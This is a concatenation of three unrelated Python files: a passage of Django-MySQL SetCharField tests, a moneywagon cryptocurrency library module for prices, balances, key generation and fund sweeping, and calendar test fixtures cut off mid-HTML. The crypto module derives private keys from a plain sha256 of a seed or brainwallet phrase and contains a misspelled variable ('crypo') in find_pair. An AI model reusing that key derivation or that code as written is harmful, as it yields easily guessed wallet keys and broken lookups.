field = SetCharField(models.IntegerField(), max_length=32)
name, path, args, kwargs = field.deconstruct()
new = SetCharField(*args, **kwargs)
assert new.base_field.__class__ == field.base_field.__class__
def test_deconstruct_with_size(self):
field = SetCharField(models.IntegerField(), size=3, max_length=32)
name, path, args, kwargs = field.deconstruct()
new = SetCharField(*args, **kwargs)
assert new.size == field.size
def test_deconstruct_args(self):
field = SetCharField(models.CharField(max_length=5), max_length=32)
name, path, args, kwargs = field.deconstruct()
new = SetCharField(*args, **kwargs)
assert new.base_field.max_length == field.base_field.max_length
def test_makemigrations(self):
field = SetCharField(models.CharField(max_length=5), max_length=32)
statement, imports = MigrationWriter.serialize(field)
# The order of the output max_length/size statements varies by
# python version, hence a little regexp to match them
assert re.compile(
r"""^django_mysql\.models\.SetCharField\(
models\.CharField\(max_length=5\),\ # space here
(
max_length=32,\ size=None|
size=None,\ max_length=32
)
\)$
""",
re.VERBOSE,
).match(statement)
class TestMigrationWriter(TestCase):
def test_makemigrations_with_size(self):
field = SetCharField(models.CharField(max_length=5), max_length=32, size=5)
statement, imports = MigrationWriter.serialize(field)
# The order of the output max_length/size statements varies by
# python version, hence a little regexp to match them
assert re.compile(
r"""^django_mysql\.models\.SetCharField\(
models\.CharField\(max_length=5\),\ # space here
(
max_length=32,\ size=5|
size=5,\ max_length=32
)
\)$
""",
re.VERBOSE,
).match(statement)
class TestMigrations(TransactionTestCase):
@override_settings(
MIGRATION_MODULES={"testapp": "tests.testapp.set_default_migrations"}
)
def test_adding_field_with_default(self):
table_name = "testapp_intsetdefaultmodel"
table_names = connection.introspection.table_names
with connection.cursor() as cursor:
assert table_name not in table_names(cursor)
call_command(
"migrate", "testapp", verbosity=0, skip_checks=True, interactive=False
)
with connection.cursor() as cursor:
assert table_name in table_names(cursor)
call_command(
"migrate",
"testapp",
"zero",
verbosity=0,
skip_checks=True,
interactive=False,
)
with connection.cursor() as cursor:
assert table_name not in table_names(cursor)
class TestSerialization(SimpleTestCase):
def test_dumping(self):
instance = CharSetModel(field={"big", "comfy"})
data = json.loads(serializers.serialize("json", [instance]))[0]
field = data["fields"]["field"]
assert sorted(field.split(",")) == ["big", "comfy"]
def test_loading(self):
test_data = """
[{"fields": {"field": "big,leather,comfy"},
"model": "testapp.CharSetModel", "pk": null}]
"""
objs = list(serializers.deserialize("json", test_data))
instance = objs[0].object
assert instance.field == {"big", "leather", "comfy"}
class TestDescription(SimpleTestCase):
def test_char(self):
field = SetCharField(models.CharField(max_length=5), max_length=32)
assert field.description == "Set of String (up to %(max_length)s)"
def test_int(self):
field = SetCharField(models.IntegerField(), max_length=32)
assert field.description == "Set of Integer"
class TestFormField(SimpleTestCase):
def test_model_field_formfield(self):
model_field = SetCharField(models.CharField(max_length=27))
form_field = model_field.formfield()
assert isinstance(form_field, SimpleSetField)
assert isinstance(form_field.base_field, forms.CharField)
assert form_field.base_field.max_length == 27
def test_model_field_formfield_size(self):
model_field = SetCharField(models.IntegerField(), size=4)
form_field = model_field.formfield()
assert isinstance(form_field, SimpleSetField)
assert form_field.max_length == 4
| |
from __future__ import print_function
import sys
from binascii import hexlify
from tabulate import tabulate
import hashlib
from base58 import b58decode_check
from .core import (
AutoFallbackFetcher, enforce_service_mode, get_optimal_services, get_magic_bytes,
RevertToPrivateMode, CurrencyNotSupported, NoService, NoServicesDefined
)
from .historical_price import Quandl
from .crypto_data import crypto_data
from bitcoin import sha256, pubtoaddr, privtopub, encode_privkey, encode_pubkey, privkey_to_address
is_py2 = False
if sys.version_info <= (3,0):
is_py2 = True
class CompositeResponse(object):
def __init__(self, service1, service2):
self.service1 = service1
self.service2 = service2
def json(self):
return {
self.service1.name: self.service1.last_raw_response.json(),
self.service2.name: self.service2.last_raw_response.json(),
}
class CompositeService(object):
"""
This object mimicks the Service class and is used when the price fetcher has
to fetch two different price sources. This object is only used when invoking
`report_services`.
"""
def __init__(self, services1, services2, via):
service1 = services1[0]
service2 = services2[0]
self.name = "%s -> %s (via %s)" % (
service1.name, service2.name, via.upper()
)
self.last_url = "%s, %s" % (service1.last_url, service2.last_url)
self.last_raw_response = CompositeResponse(service1, service2)
self.service_id = "%d+%d" % (service1.service_id, service2.service_id)
def __repr__(self):
return "<Composite Service: %s>" % self.name
def _try_price_fetch(services, args, modes):
try:
return enforce_service_mode(
services, CurrentPrice, args, modes=modes
)
except NoService as exc:
return exc
def get_current_price(crypto, fiat, services=None, convert_to=None, helper_prices=None, **modes):
"""
High level function for getting current exchange rate for a cryptocurrency.
If the fiat value is not explicitly defined, it will try the wildcard service.
if that does not work, it tries converting to an intermediate cryptocurrency
if available.
"""
fiat = fiat.lower()
args = {'crypto': crypto, 'fiat': fiat, 'convert_to': convert_to}
if not services:
services = get_optimal_services(crypto, 'current_price')
if fiat in services:
# first, try service with explicit fiat support
try_services = services[fiat]
result = _try_price_fetch(try_services, args, modes)
if not isinstance(result, Exception):
return result
if '*' in services:
# then try wildcard service
try_services = services['*']
result = _try_price_fetch(try_services, args, modes)
if not isinstance(result, Exception):
return result
def _do_composite_price_fetch(crypto, convert_crypto, fiat, helpers, modes):
before = modes.get('report_services', False)
modes['report_services'] = True
services1, converted_price = get_current_price(crypto, convert_crypto, **modes)
if not helpers or convert_crypto not in helpers[fiat]:
services2, fiat_price = get_current_price(convert_crypto, fiat, **modes)
else:
services2, fiat_price = helpers[fiat][convert_crypto]
modes['report_services'] = before
if modes.get('report_services', False):
serv = CompositeService(services1, services2, convert_crypto)
return [serv], converted_price * fiat_price
else:
return converted_price * fiat_price
for composite_attempt in ['btc', 'ltc', 'doge', 'uno']:
if composite_attempt in services and services[composite_attempt]:
result = _do_composite_price_fetch(
crypto, composite_attempt, fiat, helper_prices, modes
)
if not isinstance(result, Exception):
return result
raise result
def get_fiat_exchange_rate(from_fiat, to_fiat):
from moneywagon.services import FreeCurrencyConverter
c = FreeCurrencyConverter()
return c.get_fiat_exchange_rate(from_fiat, to_fiat)
def get_address_balance(crypto, address=None, addresses=None, services=None, **modes):
if not services:
services = get_optimal_services(crypto, 'address_balance')
args = {'crypto': crypto}
if address:
args['address'] = address
elif addresses:
args['addresses'] = addresses
else:
raise Exception("Either address or addresses but not both")
results = enforce_service_mode(
services, AddressBalance, args, modes=modes
)
if modes.get('private') and addresses:
results['total_balance'] = sum(results.values())
if modes.get('private') and modes.get('report_services', False):
# private mode does not return services (its not practical),
# an empty list is returned in its place to simplify the API.
return [], results
return results
def get_historical_transactions(crypto, address=None, addresses=None, services=None, **modes):
if not services:
services = get_optimal_services(crypto, 'historical_transactions')
kwargs = {'crypto': crypto}
if addresses:
kwargs['addresses'] = addresses
if address:
kwargs['address'] = address
try:
txs = enforce_service_mode(
services, HistoricalTransactions, kwargs, modes=modes
)
except RevertToPrivateMode:
# no services implement get_historical_transactions_multi...
modes['private'] = 1
if modes.get('verbose'):
print("Can't make with single API call. Retrying with private mode")
txs = enforce_service_mode(
services, HistoricalTransactions, kwargs, modes=modes
)
if modes.get('private'):
# private mode returns items indexed by address, this only makes sense to do
# for address balance, so remove it here
just_txs = []
[just_txs.extend(x) for x in txs.values()]
txs = sorted(just_txs, key=lambda tx: tx['date'], reverse=True)
no_duplicates = []
all_txids = []
for tx in txs:
# private mode may return duplicate txs, remove them here.
if tx['txid'] in all_txids:
continue
all_txids.append(tx['txid'])
no_duplicates.append(tx)
txs = no_duplicates
if modes.get('report_services', False):
# private mode does not return services (its not practical),
# an empty list is returned in its place to simplify the API.
return [], txs
return txs
def get_single_transaction(crypto, txid, services=None, **modes):
if not services:
services = get_optimal_services(crypto, 'single_transaction')
return enforce_service_mode(
services, SingleTransaction, {'crypto': crypto, 'txid': txid}, modes=modes
)
def get_unspent_outputs(crypto, address=None, addresses=None, services=None, **modes):
if not services:
services = get_optimal_services(crypto, 'unspent_outputs')
kwargs = {'crypto': crypto}
if addresses:
kwargs['addresses'] = addresses
if address:
kwargs['address'] = address
try:
utxos = enforce_service_mode(
services, UnspentOutputs, kwargs, modes=modes
)
except RevertToPrivateMode:
# no services implement get_unspent_outputs_multi...
modes['private'] = 1
if modes.get('verbose'):
print("Can't make with single API call. Retrying with private mode")
utxos = enforce_service_mode(
services, UnspentOutputs, kwargs, modes=modes
)
if modes.get('private'):
# private mode returns items indexed by address, this only makes sense to do
# for address balance, so remove it here
just_utxos = []
[just_utxos.extend(x) for x in utxos.values()]
utxos = sorted(just_utxos, key=lambda tx: tx['output'])
if modes.get('report_services', False):
# private mode does not return services (its not practical),
# an empty list is returned in its place to satisfy the API.
return [], utxos
return utxos
def get_historical_price(crypto, fiat, date):
"""
Only one service is defined for geting historical price, so no fetching modes
are needed.
"""
return HistoricalPrice().action(crypto, fiat, date)
def push_tx(crypto, tx_hex, services=None, **modes):
if not services:
services = get_optimal_services(crypto, 'push_tx')
return enforce_service_mode(
services, PushTx, {'crypto': crypto, 'tx_hex': tx_hex}, modes=modes
)
def get_block(crypto, block_number=None, block_hash=None, latest=False, services=None, **modes):
if not services:
services = get_optimal_services(crypto, 'get_block')
kwargs = dict(crypto=crypto, block_number=block_number, block_hash=block_hash, latest=latest)
return enforce_service_mode(
services, GetBlock, kwargs, modes=modes
)
def get_optimal_fee(crypto, tx_bytes, **modes):
"""
Get the optimal fee based on how big the transaction is. Currently this
is only provided for BTC. Other currencies will return $0.02 in satoshi.
"""
try:
services = get_optimal_services(crypto, 'get_optimal_fee')
except NoServicesDefined:
convert = get_current_price(crypto, 'usd')
fee = int(0.02 / convert * 1e8)
if modes.get('report_services'):
return [None], fee
else:
return fee
fee = enforce_service_mode(
services, OptimalFee, dict(crypto=crypto, tx_bytes=tx_bytes), modes=modes
)
if modes.get('report_services'):
return fee[0], int(fee[1])
else:
return int(fee)
def get_onchain_exchange_rates(deposit_crypto=None, withdraw_crypto=None, **modes):
"""
Gets exchange rates for all defined on-chain exchange services.
"""
from moneywagon.onchain_exchange import ALL_SERVICES
rates = []
for Service in ALL_SERVICES:
srv = Service(verbose=modes.get('verbose', False))
rates.extend(srv.onchain_exchange_rates())
if deposit_crypto:
rates = [x for x in rates if x['deposit_currency']['code'] == deposit_crypto.upper()]
if withdraw_crypto:
rates = [x for x in rates if x['withdraw_currency']['code'] == withdraw_crypto.upper()]
if modes.get('best', False):
return max(rates, key=lambda x: float(x['rate']))
return rates
def generate_keypair(crypto, seed, password=None):
"""
Generate a private key and publickey for any currency, given a seed.
That seed can be random, or a brainwallet phrase.
"""
if crypto in ['eth', 'etc']:
raise CurrencyNotSupported("Ethereums not yet supported")
pub_byte, priv_byte = get_magic_bytes(crypto)
priv = sha256(seed)
pub = privtopub(priv)
priv_wif = encode_privkey(priv, 'wif_compressed', vbyte=priv_byte)
if password:
# pycrypto etc. must be installed or this will raise ImportError, hence inline import.
from .bip38 import Bip38EncryptedPrivateKey
priv_wif = str(Bip38EncryptedPrivateKey.encrypt(crypto, priv_wif, password))
compressed_pub = encode_pubkey(pub, 'hex_compressed')
ret = {
'public': {
'hex_uncompressed': pub,
'hex': compressed_pub,
'address': pubtoaddr(compressed_pub, pub_byte)
},
'private': {
'wif': priv_wif
}
}
if not password:
# only these are valid when no bip38 password is supplied
ret['private']['hex'] = encode_privkey(priv, 'hex_compressed', vbyte=priv_byte)
ret['private']['hex_uncompressed'] = encode_privkey(priv, 'hex', vbyte=priv_byte)
ret['private']['wif_uncompressed'] = encode_privkey(priv, 'wif', vbyte=priv_byte)
return ret
def wif_to_address(crypto, wif):
try:
return privkey_to_address(wif, crypto_data[crypto]['address_version_byte'])
except KeyError:
raise CurrencyNotSupported("Currency not yet supported")
def sweep(crypto, private_key, to_address, fee=None, password=None, **modes):
"""
Move all funds by private key to another address.
"""
from moneywagon.tx import Transaction
tx = Transaction(crypto, verbose=modes.get('verbose', False))
tx.add_inputs(private_key=private_key, password=password, **modes)
tx.change_address = to_address
tx.fee(fee)
return tx.push()
def get_explorer_url(crypto, address=None, txid=None, blocknum=None, blockhash=None):
services = crypto_data[crypto]['services']['address_balance']
urls = []
context = {'crypto': crypto}
if address:
attr = "explorer_address_url"
context['address'] = address
elif txid:
attr = "explorer_tx_url"
context['txid'] = txid
elif blocknum:
attr = "explorer_blocknum_url"
context['blocknum'] = blocknum
elif blockhash:
attr = "explorer_blockhash_url"
context['blockhash'] = blockhash
for service in services:
template = getattr(service, attr)
context['domain'] = service.domain
context['protocol'] = service.protocol
if hasattr(service, '_get_coin'):
# used for when a service uses another name for a certain coin
# other than the standard three letter currency code.
context['coin'] = service._get_coin(crypto)
if template:
# render the explorer url temlate
urls.append(template.format(**context))
return urls
def guess_currency_from_address(address):
"""
Given a crypto address, find which currency it likely belongs to.
Raises an exception if it can't find a match. Raises exception if address
is invalid.
"""
if is_py2:
fixer = lambda x: int(x.encode('hex'), 16)
else:
fixer = lambda x: x # does nothing
first_byte = fixer(b58decode_check(address)[0])
double_first_byte = fixer(b58decode_check(address)[:2])
hits = []
for currency, data in crypto_data.items():
if hasattr(data, 'get'): # skip incomplete data listings
version = data.get('address_version_byte', None)
if version is not None and version in [double_first_byte, first_byte]:
hits.append([currency, data['name']])
if hits:
return hits
raise ValueError("Unknown Currency with first byte: %s" % first_byte)
class OptimalFee(AutoFallbackFetcher):
def action(self, crypto, tx_bytes):
crypto = crypto.lower()
return self._try_services("get_optimal_fee", crypto, tx_bytes)
def no_service_msg(self, crypto, tx_bytes):
return "Could not get optimal fee for: %s" % crypto
class SingleTransaction(AutoFallbackFetcher):
def action(self, crypto, txid):
crypto = crypto.lower()
return self._try_services("get_single_transaction", crypto, txid)
@classmethod
def strip_for_consensus(cls, result):
return "%.8f %.8f" % (result['total_in'], result['total_out'])
def no_service_msg(self, crypto, txid=None, txids=None):
return "Could not get transaction info for: %s:%s" % (crypto, txid or ', '.join(txids))
class GetBlock(AutoFallbackFetcher):
def action(self, crypto, block_number='', block_hash='', latest=False):
if sum([type(block_number)==int, bool(block_hash), bool(latest)]) != 1:
raise ValueError("Only one of `block_hash`, `latest`, or `block_number` allowed.")
return self._try_services(
'get_block', crypto, block_number=block_number, block_hash=block_hash, latest=latest
)
def no_service_msg(self, crypto, block_number=None, block_hash=None, latest=False):
block = block_number or block_hash or ('latest' if latest else 'None')
return "Could not get %s block: %s" % (
crypto, block
)
@classmethod
def strip_for_consensus(self, result):
return "%s, %s, %s" % (
result['hash'], result['block_number'], result['size']
)
class HistoricalTransactions(AutoFallbackFetcher):
def action(self, crypto, address=None, addresses=None):
if addresses:
method_name = "get_transactions_multi"
kwargs = dict(addresses=addresses)
if address:
method_name = "get_transactions"
kwargs = dict(address=address)
txs = self._try_services(method_name, crypto, **kwargs)
return sorted(txs, key=lambda tx: tx['date'], reverse=True)
def no_service_msg(self, crypto, address=None, addresses=None):
return "Could not get transactions for: %s:%s" % (crypto, address or ', '.join(addresses))
@classmethod
def strip_for_consensus(cls, results):
stripped = []
for result in results:
result.sort(key=lambda x: x['date'])
stripped.append(
", ".join(
["[id: %s, amount: %s]" % (x['txid'], x['amount']) for x in result]
)
)
return stripped
class UnspentOutputs(AutoFallbackFetcher):
def action(self, crypto, address=None, addresses=None):
if addresses:
method_name = "get_unspent_outputs_multi"
kwargs = dict(addresses=addresses)
if address:
method_name = "get_unspent_outputs"
kwargs = dict(address=address)
utxos = self._try_services(method_name, crypto=crypto, **kwargs)
return sorted(utxos, key=lambda x: x['output'])
def no_service_msg(self, crypto, address=None, addresses=None):
return "Could not get unspent outputs for: %s:%s" % (crypto, address or ', '.join(addresses))
@classmethod
def strip_for_consensus(cls, results):
stripped = []
for result in results:
result.sort(key=lambda x: x['output'])
stripped.append(
", ".join(
["[output: %s, value: %s]" % (x['output'], x['amount']) for x in result]
)
)
return stripped
class CurrentPrice(AutoFallbackFetcher):
def action(self, crypto, fiat, convert_to=None):
if crypto.lower() == fiat.lower():
return (1.0, 'math')
ret = self._try_services('get_current_price', crypto=crypto, fiat=fiat)
if convert_to:
return ret / get_fiat_exchange_rate(from_fiat=fiat, to_fiat=convert_to)
return ret
def simplify_for_average(self, value):
return value
def no_service_msg(self, crypto, fiat):
return "Can not find current price for %s->%s" % (crypto, fiat)
class AddressBalance(AutoFallbackFetcher):
def action(self, crypto, address=None, addresses=None, confirmations=1):
kwargs = dict(crypto=crypto, confirmations=confirmations)
if address:
method_name = "get_balance"
kwargs['address'] = address
if addresses:
method_name = "get_balance_multi"
kwargs['addresses'] = addresses
results = self._try_services(method_name, **kwargs)
if addresses and 'total_balance' not in results:
results['total_balance'] = sum(results.values())
return results
def no_service_msg(self, crypto, address=None, addresses=None, confirmations=1):
return "Could not get confirmed address balance for: %s" % crypto
class PushTx(AutoFallbackFetcher):
def action(self, crypto, tx_hex):
return self._try_services("push_tx", crypto=crypto, tx_hex=tx_hex)
def no_service_msg(self, crypto, tx_hex):
return "Could not push this %s transaction." % crypto
class HistoricalPrice(object):
"""
This one doesn't inherit from AutoFallbackFetcher because there is only one
historical price API service at the moment.
"""
def __init__(self, responses=None, verbose=False):
self.service = Quandl(responses, verbose=verbose)
def action(self, crypto, fiat, at_time):
crypto = crypto.lower()
fiat = fiat.lower()
if crypto != 'btc' and fiat != 'btc':
# two external requests and some math is going to be needed.
from_btc, source1, date1 = self.service.get_historical(crypto, 'btc', at_time)
to_altcoin, source2, date2 = self.service.get_historical('btc', fiat, at_time)
return (from_btc * to_altcoin), "%s x %s" % (source1, source2), date1
else:
return self.service.get_historical(crypto, fiat, at_time)
@property
def responses(self):
return self.service.responses
def _get_all_services(crypto=None):
"""
Go through the crypto_data structure and return all list of all (unique)
installed services. Optionally filter by crypto-currency.
"""
if not crypto:
# no currency specified, get all services
to_iterate = crypto_data.items()
else:
# limit to one currency
to_iterate = [(crypto, crypto_data[crypto])]
services = []
for currency, data in to_iterate:
if 'services' not in data:
continue
if currency == '':
continue # template
# price services are defined as dictionaries, all other services
# are defined as a list.
price_services = data['services']['current_price']
del data['services']['current_price']
all_services = list(data['services'].values()) + list(price_services.values())
data['services']['current_price'] = price_services
services.append([
item for sublist in all_services for item in sublist
])
return sorted(
set([item for sublist in services for item in sublist]),
key=lambda x: x.__name__
)
ALL_SERVICES = _get_all_services()
def service_table(format='simple'):
"""
Returns a string depicting all services currently installed.
"""
if format == 'html':
linkify = lambda x: "<a href='{0}' target='_blank'>{0}</a>".format(x)
else:
linkify = lambda x: x
ret = []
for service in sorted(ALL_SERVICES, key=lambda x: x.service_id):
ret.append([
service.service_id,
service.__name__, linkify(service.api_homepage.format(
domain=service.domain, protocol=service.protocol
)),
", ".join(service.supported_cryptos or [])
])
return tabulate(ret, headers=['ID', 'Name', 'URL', 'Supported Currencies'], tablefmt=format)
def wif_to_hex(wif):
"""
Convert a WIF encded private key and return the raw hex encoded private key
This function works for all bitcoin-API compatable coins.
"""
return hexlify(b58decode_check(wif)[1:]).upper()
class ExchangeUniverse(object):
def __init__(self, verbose=False):
self.all_pairs = {}
for Service in ALL_SERVICES:
try:
self.all_pairs[Service] = Service(verbose=verbose).get_pairs()
except NotImplementedError:
pass
except Exception as exc:
print("%s returned error: %s" % (Service.__name__, exc))
def find_pair(self, crypto="", fiat="", verbose=False):
"""
This utility is used to find an exchange that supports a given exchange pair.
"""
if not crypto and not fiat:
raise Exception("Fiat or Crypto required")
def is_matched(crypto, fiat, pair):
if crypto and not fiat:
return pair.startswith("%s-" % crypto)
if crypto and fiat:
return pair == "%s-%s" % (crypo, fiat)
if not crypto:
return pair.endswith("-%s" % fiat)
matched_pairs = {}
for Service, pairs in self.all_pairs.items():
matched = [p for p in pairs if is_matched(crypto, fiat, p)]
if matched:
matched_pairs[Service] = matched
return matched_pairs
def all_cryptos(self):
all_cryptos = set()
for Service, pairs in self.all_pairs.items():
for pair in pairs:
crypto = pair.split("-")[0]
all_cryptos.add(crypto)
return sorted(all_cryptos)
def most_supported(self, skip_supported=False):
counts = []
for crypto in self.all_cryptos():
if skip_supported and crypto in crypto_data:
continue
matched = self.find_pair(crypto=crypto)
count = sum(len(x) for x in matched.values())
counts.append([crypto, count])
return sorted(counts, key=lambda x: x[1], reverse=True)
def wif_to_address(crypto, wif):
if is_py2:
wif_byte = int(hexlify(b58decode_check(wif)[0]), 16)
else:
wif_byte = b58decode_check(wif)[0]
if not wif_byte == crypto_data[crypto.lower()]['private_key_prefix']:
msg = 'WIF encoded with wrong prefix byte. Are you sure this is a %s address?' % crypto.upper()
raise Exception(msg)
address_byte = crypto_data[crypto.lower()]['address_version_byte']
return privkey_to_address(wif, address_byte)
| |
import calendar
import unittest
from test import test_support
result_2004_text = """
2004
January February March
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 1 1 2 3 4 5 6 7
5 6 7 8 9 10 11 2 3 4 5 6 7 8 8 9 10 11 12 13 14
12 13 14 15 16 17 18 9 10 11 12 13 14 15 15 16 17 18 19 20 21
19 20 21 22 23 24 25 16 17 18 19 20 21 22 22 23 24 25 26 27 28
26 27 28 29 30 31 23 24 25 26 27 28 29 29 30 31
April May June
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 1 2 1 2 3 4 5 6
5 6 7 8 9 10 11 3 4 5 6 7 8 9 7 8 9 10 11 12 13
12 13 14 15 16 17 18 10 11 12 13 14 15 16 14 15 16 17 18 19 20
19 20 21 22 23 24 25 17 18 19 20 21 22 23 21 22 23 24 25 26 27
26 27 28 29 30 24 25 26 27 28 29 30 28 29 30
31
July August September
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 1 1 2 3 4 5
5 6 7 8 9 10 11 2 3 4 5 6 7 8 6 7 8 9 10 11 12
12 13 14 15 16 17 18 9 10 11 12 13 14 15 13 14 15 16 17 18 19
19 20 21 22 23 24 25 16 17 18 19 20 21 22 20 21 22 23 24 25 26
26 27 28 29 30 31 23 24 25 26 27 28 29 27 28 29 30
30 31
October November December
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 1 2 3 4 5 6 7 1 2 3 4 5
4 5 6 7 8 9 10 8 9 10 11 12 13 14 6 7 8 9 10 11 12
11 12 13 14 15 16 17 15 16 17 18 19 20 21 13 14 15 16 17 18 19
18 19 20 21 22 23 24 22 23 24 25 26 27 28 20 21 22 23 24 25 26
25 26 27 28 29 30 31 29 30 27 28 29 30 31
"""
result_2004_html = """
<?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ascii" />
<link rel="stylesheet" type="text/css" href="calendar.css" />
<title>Calendar for 2004</title>
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" class="year">
<tr><th colspan="3" class="year">2004</th></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">January</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="thu">1</td><td class="fri">2</td><td class="sat">3</td><td class="sun">4</td></tr>
<tr><td class="mon">5</td><td class="tue">6</td><td class="wed">7</td><td class="thu">8</td><td class="fri">9</td><td class="sat">10</td><td class="sun">11</td></tr>
<tr><td class="mon">12</td><td class="tue">13</td><td class="wed">14</td><td class="thu">15</td><td class="fri">16</td><td class="sat">17</td><td class="sun">18</td></tr>
<tr><td class="mon">19</td><td class="tue">20</td><td class="wed">21</td><td class="thu">22</td><td class="fri">23</td><td class="sat">24</td><td class="sun">25</td></tr>
<tr><td class="mon">26</td><td class="tue">27</td><td class="wed">28</td><td class="thu">29</td><td class="fri">30</td><td class="sat">31</td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">February</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="sun">1</td></tr>
<tr><td class="mon">2</td><td class="tue">3</td><td class="wed">4</td><td class="thu">5</td><td class="fri">6</td><td class="sat">7</td><td class="sun">8</td></tr>
<tr><td class="mon">9</td><td class="tue">10</td><td class="wed">11</td><td class="thu">12</td><td class="fri">13</td><td class="sat">14</td><td class="sun">15</td></tr>
<tr><td class="mon">16</td><td class="tue">17</td><td class="wed">18</td><td class="thu">19</td><td class="fri">20</td><td class="sat">21</td><td class="sun">22</td></tr>
<tr><td class="mon">23</td><td class="tue">24</td><td class="wed">25</td><td class="thu">26</td><td class="fri">27</td><td class="sat">28</td><td class="sun">29</td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">March</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="mon">1</td><td class="tue">2</td><td class="wed">3</td><td class="thu">4</td><td class="fri">5</td><td class="sat">6</td><td class="sun">7</td></tr>
<tr><td class="mon">8</td><td class="tue">9</td><td class="wed">10</td><td class="thu">11</td><td class="fri">12</td><td class="sat">13</td><td class="sun">14</td></tr>
<tr><td class="mon">15</td><td class="tue">16</td><td class="wed">17</td><td class="thu">18</td><td class="fri">19</td><td class="sat">20</td><td class="sun">21</td></tr>
<tr><td class="mon">22</td><td class="tue">23</td><td class="wed">24</td><td class="thu">25</td><td class="fri">26</td><td class="sat">27</td><td class="sun">28</td></tr>
<tr><td class="mon">29</td><td class="tue">30</td><td class="wed">31</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">April</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="thu">1</td><td class="fri">2</td><td class="sat">3</td><td class="sun">4</td></tr>
<tr><td class="mon">5</td><td class="tue">6</td><td class="wed">7</td><td class="thu">8</td><td class="fri">9</td><td class="sat">10</td><td class="sun">11</td></tr>
<tr><td class="mon">12</td><td class="tue">13</td><td class="wed">14</td><td class="thu">15</td><td class="fri">16</td><td class="sat">17</td><td class="sun">18</td></tr>
<tr><td class="mon">19</td><td class="tue">20</td><td class="wed">21</td><td class="thu">22</td><td class="fri">23</td><td class="sat">24</td><td class="sun">25</td></tr>
<tr><td class="mon">26</td><td class="tue">27</td><td class="wed">28</td><td class="thu">29</td><td class="fri">30</td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">May</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="sat">1</td><td class="sun">2</td></tr>
<tr><td class="mon">3</td><td class="tue">4</td><td class="wed">5</td><td class="thu">6</td><td class="fri">7</td><td class="sat">8</td><td class="sun">9</td></tr>
<tr><td class="mon">10</td><td class="tue">11</td><td class="wed">12</td><td class="thu">13</td><td class="fri">14</td><td class="sat">15</td><td class="sun">16</td></tr>
<tr><td class="mon">17</td><td class="tue">18</td><td class="wed">19</td><td class="thu">20</td><td class="fri">21</td><td class="sat">22</td><td class="sun">23</td></tr>
<tr><td class="mon">24</td><td class="tue">25</td><td class="wed">26</td><td class="thu">27</td><td class="fri">28</td><td class="sat">29</td><td class="sun">30</td></tr>
<tr><td class="mon">31</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">June</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="tue">1</td><td class="wed">2</td><td class="thu">3</td><td class="fri">4</td><td class="sat">5</td><td class="sun">6</td></tr>
<tr><td class="mon">7</td><td class="tue">8</td><td class="wed">9</td><td class="thu">10</td><td class="fri">11</td><td class="sat">12</td><td class="sun">13</td></tr>
<tr><td class="mon">14</td><td class="tue">15</td><td class="wed">16</td><td class="thu">17</td><td class="fri">18</td><td class="sat">19</td><td class="sun">20</td></tr>
<tr><td class="mon">21</td><td class="tue">22</td><td class="wed">23</td><td class="thu">24</td><td class="fri">25</td><td class="sat">26</td><td class="sun">27</td></tr>
<tr><td class="mon">28</td><td class="tue">29</td><td class="wed">30</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">July</th></tr>
